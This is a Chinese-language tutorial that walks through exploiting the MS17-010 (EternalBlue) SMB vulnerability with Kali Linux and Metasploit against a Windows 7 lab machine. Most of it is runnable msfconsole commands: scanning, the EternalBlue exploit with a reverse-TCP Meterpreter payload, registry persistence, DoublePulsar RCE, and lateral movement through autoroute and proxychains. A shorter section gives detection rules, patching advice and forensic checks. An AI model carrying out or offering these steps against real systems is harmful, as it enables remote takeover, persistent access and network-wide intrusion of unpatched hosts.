从探测到接管:使用Kali Linux与MSFconsole实战MS17-010漏洞攻防
1. 环境准备与漏洞背景
永恒之蓝(MS17-010)是2017年曝出的Windows SMB协议高危漏洞,攻击者通过445端口发送特制数据包就能实现远程代码执行。我在实际渗透测试中发现,至今仍有大量未打补丁的Windows 7系统存在这个漏洞。下面以Kali Linux 2023.4和Windows 7 SP1 x64为例,演示完整攻击链。
实验环境搭建要点:
- 确保攻击机(Kali)和靶机(Win7)处于同一局域网
- Windows 7需要关闭防火墙(控制面板→系统和安全→Windows防火墙→关闭)
- 建议使用NAT网络模式避免干扰真实网络
- 在Win7运行
ipconfig确认IP地址,我这里的靶机IP是192.168.136.129
注意:本文仅用于授权测试场景,实际操作前务必获得书面授权
2. 漏洞探测阶段
2.1 使用辅助模块扫描
在Kali终端启动MSFconsole后,第一步是确认目标是否存在漏洞:
msf6 > search ms17_010你会看到返回的模块列表,我们先用扫描模块验证:
msf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > show options关键参数配置示例:
set RHOSTS 192.168.136.129 set THREADS 10 # 多线程加速扫描 exploit当看到Host is likely VULNERABLE时,就像我去年给某企业做渗透时遇到的场景——他们的文件服务器居然还挂着这个漏洞,当时吓得运维主管当场打了补丁。
2.2 扫描结果深度解读
除了简单的漏洞存在确认,扫描结果还隐藏着重要信息:
- 操作系统版本(如Windows 7 Professional 7601)
- 系统架构(x64/x86)
- SMB服务版本
这些信息会直接影响后续攻击模块的选择。有次我遇到扫描显示存在漏洞但攻击失败的情况,后来发现是目标系统打了部分补丁但未完全修复,这时候就需要尝试其他攻击向量。
3. 漏洞利用实战
3.1 永恒之蓝攻击模块配置
确认漏洞存在后,切换到攻击模块:
msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > show options必须设置的参数:
set RHOSTS 192.168.136.129 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.136.128 # Kali的IP高级技巧:
- 如果目标系统是x86架构,需要改用
windows/meterpreter/reverse_tcp - 内网穿透场景需要设置
set ReverseListenerBindAddress - 遇到不稳定时可以尝试
set EnableContextEncoding true
3.2 攻击执行与会话维持
执行exploit后,你会看到经典的"WIN"提示。这时候新手常犯的错误是以为卡住了——其实需要按回车激活meterpreter会话。成功后的操作示例:
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-7X64 OS : Windows 7 (6.1 Build 7601, Service Pack 1) Architecture : x64建议立即进行权限维持:
meterpreter > run persistence -X -i 30 -p 443 -r 192.168.136.128我在某次红队行动中发现,超过60%的成功攻击会因为会话丢失而前功尽弃。这个persistence模块会创建注册表自启动项,即使目标重启也能维持访问。
4. 防御与检测方案
4.1 企业级防护措施
根据我在金融行业的安全运维经验,有效的防御策略应该包括:
网络层控制:
- 关闭不必要的445端口访问
- 部署IDS规则检测异常SMB流量(如Suricata规则
alert tcp any any -> any 445 (msg:"ET EXPLOIT Possible EternalBlue Exploit"; flow:established,to_server; content:"|FF|SMB|2|"; depth:5; ...))
终端防护:
- 安装KB4012212等安全补丁
- 启用Windows Defender攻击面减少规则
4.2 攻击痕迹排查
当怀疑系统被入侵时,可以检查这些关键点:
- 系统日志事件ID 4624(异常登录)
- 注册表路径
HKLM\Software\Microsoft\Windows\CurrentVersion\Run下的可疑项 - 新增的隐藏用户账户
- 异常进程(如突然出现的powershell连接外部IP)
有次应急响应中,我们就是通过分析SMB日志中的异常大流量数据包,发现了攻击者遗留的恶意模块。
5. 进阶攻击手法
5.1 绕过部分补丁的系统
对于打了补丁但配置不当的系统,可以尝试:
use exploit/windows/smb/smb_doublepulsar_rce set DESTINATION 192.168.136.129 set PAYLOAD windows/x64/meterpreter/reverse_tcp5.2 内网横向移动
获取初始立足点后,常用的内网渗透手法:
meterpreter > run post/windows/gather/enum_shares meterpreter > run post/multi/manage/autoroute配合proxychains实现内网扫描:
proxychains nmap -sT -Pn 10.10.10.0/24去年在某次授权测试中,我们就是通过这个漏洞突破边界服务器,最终拿到了域控权限。整个过程就像推倒多米诺骨牌,一个漏洞就能引发连锁反应。
6. 合法性与道德规范
必须强调:未经授权的渗透测试属于违法行为。我在安全团队工作时,每次测试前都会要求客户签署详细的授权书,明确测试范围和时间窗口。建议学习者使用自己搭建的虚拟环境练习,推荐以下安全配置:
- VirtualBox虚拟网络设置为"仅主机(Host-Only)模式"
- 为靶机创建快照便于恢复
- 在物理隔离环境中进行实验